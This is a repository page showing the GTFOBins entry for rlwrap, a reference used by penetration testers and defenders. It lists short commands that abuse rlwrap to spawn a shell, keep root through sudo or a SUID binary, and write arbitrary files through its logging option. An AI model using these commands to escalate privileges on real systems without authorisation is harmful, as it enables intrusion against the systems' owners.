This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
3cc3be5aa5d873018c3c5cf904f10eba7449fbfa
GTFOBins.github.io
/
_gtfobins
/
rlwrap.md
Andrea Cardaci
3cc3be5aa5
Use /dev/null as history for rlwrap
2018-06-04 13:09:55 +02:00
331 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
file-write
code
rlwrap /bin/sh
code
sudo rlwrap /bin/sh
code
./rlwrap -H /dev/null /bin/sh -p
description
code
This adds timestamps to the output file.
LFILE=file_to_write rlwrap -l "$LFILE" echo data
Reference in New Issue
View Git Blame
Copy Permalink